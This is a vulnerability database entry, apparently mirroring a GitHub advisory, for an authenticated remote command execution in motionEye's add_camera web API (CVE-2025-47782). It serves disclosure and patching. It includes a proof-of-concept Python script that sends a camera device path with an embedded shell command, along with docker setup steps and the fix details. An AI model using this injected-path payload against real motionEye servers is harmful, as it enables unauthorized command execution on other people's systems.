logo

Database

Remote command execution In motioneye

Description

motionEye vulnerable to RCE in add_camera Function Due to unsafe command execution

Summary

Using a constructed (camera) device path with the config/add/add_camera motionEye web API allows an attacker with motionEye admin user credentials to execute any UNIX shell code within a non-interactive shell as executing user of the motionEye instance, motion by default.

function call stack

    post

    add_camera

    config.add_camera

    v4l2ctl.list_resolutions

    utils.call_subprocess

    subprocess.run

PoC

build

RUN_USER="user"
RUN_UID=$(id -u ${RUN_USER})
RUN_GID=$(id -g ${RUN_USER})
TIMESTAMP="$(date '+%Y%m%d-%H%M')"

docker build \
  --network host \
  --build-arg="RUN_UID=${RUN_UID?}" \...

reproduce

Run:

docker run --rm  -d   -p 8765:8765   --hostname="motioneye"   -v /etc/localtime:/etc/localtime:ro   -v /tmp/motioneyeconfig:/etc/motioneye   -v /tmp/motioneyeconfig:/var/lib/motioneye

bash-4.2$ docker logs ceb435eacf55 -f
configure_logging cmd motioneye: False
configure logging to file: None
    INFO: hello! this is motionEye server 0.43.1b3
   DEBUG: found motion executable "/usr/bin/motion" version "4.7.0"
   DEBUG: found ffmpeg executable "/usr/bin/ffmpeg" version "7.1.1-1+b1"
   DEBUG: listing config dir /etc/motioneye...
   DEBUG: found camera with id 1...

Now, run the following script to attack motionEye:

import requests
import json

url = "http://your_ip:8765/config/add?_username=admin&_signature=c22baef3399cb7328e22ded1ca68395b4daecd18"

payload = json.dumps({
  "proto": "v4l2",
  "path": "' `touch /tmp/bbbb` '"...
Image Image

Discussion

It is obvious that call_subprocess was used to execute the incoming data, resulting in a vulnerability

def list_resolutions(device):
    from motioneye import motionctl

    device = utils.make_str(device)

    if device in _resolutions_cache:
        return _resolutions_cache[device]
...

Impact

RCE

Patches

The vulnerability has been patch with motionEye v0.43.1b4: https://github.com/motioneye-project/motioneye/pull/3143

Workarounds

Applying the following patch, replacing the literal single quotes in the created cmd string with a shlex.quoted input device: https://patch-diff.githubusercontent.com/raw/motioneye-project/motioneye/pull/3143.patch

References

https://github.com/motioneye-project/motioneye/issues/3142

Credit

The vulnerability was discovered by Tencent YunDing Security Lab.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2025-477822. NVD-2025-477823. OSV-2025-477824. GHSA-g5mq-prx7-c5885. GCVE-2025-47782

References

1. https://github.com/motioneye-project/motioneye/security/advisories/GHSA-g5mq-prx7-c5882. https://github.com/motioneye-project/motioneye/issues/31423. https://github.com/motioneye-project/motioneye/pull/31434. https://github.com/pypa/advisory-database/tree/main/vulns/motioneye/PYSEC-2025-39.yaml

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.